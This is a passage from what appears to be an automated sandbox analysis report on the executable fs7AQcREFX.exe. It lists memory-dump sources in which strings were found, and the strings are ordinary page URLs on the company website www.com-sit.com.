00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/hr/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/impressum/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/intelligent-sourcing/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/karriere/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/logistics/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/management/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/marketing/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/personal-stories/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/remarking-test/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/rohs-test/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/sales/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/send-us-your-bom/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/serviceleistungen-loesungen/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/soldering-test/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/temptest/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/testhouse/
